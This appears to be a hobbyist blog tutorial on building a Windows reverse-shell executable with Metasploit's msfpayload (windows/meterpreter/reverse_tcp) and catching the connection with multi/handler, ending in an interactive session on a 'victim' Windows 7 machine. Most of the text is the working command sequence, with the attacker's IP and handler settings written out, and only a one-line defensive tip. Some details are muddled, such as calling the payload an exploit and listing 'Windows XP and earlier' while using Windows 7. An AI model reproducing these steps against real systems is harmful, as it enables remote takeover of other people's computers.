Type : Tutorial
Level : Easy
As I have already wrote on my previous post about how to add a user with administrator rights (you can read the tips and trick here), today I will wrote a simple tutorial to create an exploit for Windows 7 and all Windows.
Everyone love and like the simple way isn’t it? that’s why in my previous tutorial and today tutorial I wrote everything about simple and easy to use 🙂
The tutorial today we will learn how to create a simple exploit (easy to create and easy to implement 🙂 ) and how we connect to Windows 7 victim that already executed our simple exploit…simple isn’t it?
Okay let’s start the tutorial.
1. Metasploit Framework 2. Windows XP and earlier Windows version (I use Windows 7 SP1)
FYI in this tutorial I use Backtrack 5 R2 with Metasploit Framework 4.2.0, and my IP address is 192.168.8.91. 1. Open your terminal console and type the following command :
msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.8.91 X > Desktop/v4L.exe
The above command will create Windows executable file with name "v4L.exe" and will be saved on your desktop.
2. Now you need to copy your newly created v4L.exe to your windows 7 system. If you didn’t know how to share your backtrack 5 folder, you can videw the tutorial how to share folder in your Backtrack (view tutorial here).
3. The next step we need to create a handler to handle the connection that came to our Backtrack system from simple exploit we’ve already created before. Open your Metasploit console, see the picture and type the following command : Information :
use exploit/multi/handler --> use the metasploit handler set payload windows/meterpreter/reverse_tcp --> we use reverse_tcp (see step 1) set lhost 192.168.8.91 --> set our local IP address that will catch the reverse connection exploit -j -z --> start the handler
4. Now you can try to execute the simple exploit we have already copy to windows 7 and see if our handler receiving something or not. Below was the screenshot of my handler when Windows 7 executed the simple exploit :
I use sessions -l to listing every sessions that already open there. 5. To interact with the available session, you can use sessions -i <session_id>. From there you can do other command as you want.
Yes we’re inside the Windows 7 now 🙂
1. Install 3rd party firewall and antivirus that always updated.
Hope it’s useful 🙂
FYI : There’s still another tutorial I will post later about Hacking Remote Desktop. You can subscribe to get the tutorial by click the button below and provide your e-mail address :